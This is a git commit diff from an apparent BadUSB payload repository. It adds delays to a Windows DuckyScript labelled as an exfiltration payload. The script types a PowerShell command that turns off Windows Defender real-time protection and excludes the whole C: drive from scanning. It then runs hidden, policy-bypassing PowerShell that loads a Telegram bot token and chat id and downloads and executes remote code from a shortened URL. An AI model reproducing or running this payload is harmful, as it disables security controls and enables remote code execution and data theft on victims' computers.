Added Delay

pull/410/head
Mr. Proxy 2023-12-24 10:51:47 +01:00 committed by GitHub
parent fb05fe51cf
commit 060984bccf
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 0 deletions

View File

@ -6,6 +6,8 @@ REM Target: Windows
REM Version: 1.0
REM Category: Exfiltration
REM Source: https://github.com/Mr-Proxy-source/BadUSB-Payloads
DELAY 1000
GUI r
DELAY 500
STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='bot-token'; $ci='chat-id'; irm https://t.ly/-qlYd | iex'"